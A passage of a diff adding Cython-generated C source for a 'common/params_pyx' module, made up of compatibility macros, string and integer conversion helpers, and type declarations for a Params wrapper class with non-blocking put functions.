lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__common__params_pyx +#define __PYX_HAVE_API__common__params_pyx +/* Early includes */ +#include +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include "common/params.h" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "common/params_pyx.pyx", + "", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_6common_10params_pyx_Params; +struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking; +struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking; +struct __pyx_obj___Pyx_EnumMeta; + +/* "common/params_pyx.pyx":35 + * pass + * + * cdef class Params: # <<<<<<<<<<<<<< + * cdef c_Params* p + * + */ +struct __pyx_obj_6common_10params_pyx_Params { + PyObject_HEAD + Params *p; +}; + + +/* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ +struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking { + PyObject_HEAD + PyObject *__pyx_v_d; + PyObject *__pyx_v_key; + PyObject *__pyx_v_val; +}; + + +/* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ +struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking { + PyObject_HEAD + PyObject *__pyx_v_d; + PyObject *__pyx_v_key; + bool __pyx_v_val; +}; + + +/* "EnumBase":16 + * + * @cython.internal + * cdef class __Pyx_EnumMeta(type): # <<<<<<<<<<<<<< + * def __init__(cls, name, parents, dct): + * type.__init__(cls, name, parents, dct) + */ +struct __pyx_obj___Pyx_EnumMeta { + PyHeapTypeObject __pyx_base; +}; + +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if 